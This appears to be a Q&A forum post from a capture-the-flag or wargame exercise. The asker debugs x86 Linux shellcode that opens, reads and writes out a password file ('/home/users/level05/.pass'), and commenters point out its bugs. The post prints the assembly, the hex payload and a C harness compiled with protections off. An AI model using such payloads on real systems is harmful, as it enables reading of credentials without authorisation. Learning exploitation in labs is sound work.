# ASM [open/read/write] shellcode segmentation fault

Tags: c, assembly, segmentation-fault, shellcode

I'm trying to write a simple shellcode to read the content of a file.

Here is my assembly:

```
xor eax, eax
    xor ecx, ecx
    xor edx, edx

    push 0x73 ; /home/users/level05/.pass
    push 0x7361702e ;
    push 0x2f35306c
    push 0x6576656c 
    push 0x2f737265
    push 0x73752f65
    push 0x6d6f682f 
    mov ebx, esp
    mov al, 0x05
    int 0x80 ; open

    mov ebx, eax
    xor eax, eax
    xor edx, edx
    mov dl, 0x10
    mov ecx, esp
    mov al, 0x03
    int 0x80 ; read

    mov ecx, eax
    xor ebx, ebx
    mov bl, 0x01
    mov al, 0x04 
    int 0x80 ; write
```

`

So if I transform it into shellcode, and simply run it, I have a segmentation fault.

I verified my code and it seems good. The file to read exists too, and I have the rights on it.

I compile it to be ran on x86 linux.

Im compiling the program with : this main:

```
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"MYSHELLCODE";

main()
{

  printf("Shellcode Length:  %d\n", strlen(code));

    int (*ret)() = (int(*)())code;

    ret();

}
```

And I run : `gcc c-shell.c -o shell -fno-stack-protector -z execstack -m32`

The shellcode : `\x31\xc0\x31\xc9\x31\xd2\x6a\x73\x68\x2e\x70\x61\x73\x68\x6c\x30\x35\x2f\x68\x6c\x65\x76\x65\x68\x65\x72\x73\x2f\x68\x65\x2f\x75\x73\x68\x2f\x68\x6f\x6d\x89\xe3\xb0\x05\xcd\x80\x89\xc3\x31\xc0\x31\xd2\xb2\x10\x89\xe1\xb0\x03\xcd\x80\x89\xc1\x31\xdb\xb3\x01\xb0\x04\xcd\x80`

68 byte
`

Comment: Your shell code doesn't seem to have a return. Also, it doesn't follow C calling convention which may or may not cause a crash. The crash itself should happen only after your code though, you forgot to mention if that's the case or not. PS: learn to use a debugger.

Comment: Show us the full code for the assembly, cannot tell if its actually assembled and linked in with the actual C code.

Comment: Not sure what you are trying to do with the write. Were you attempting to write the string to stdout? If that is the case the read returns the number of characters read in EAX, and you don't set the buffer to write. Maybe you intended to mov ESP to ECX?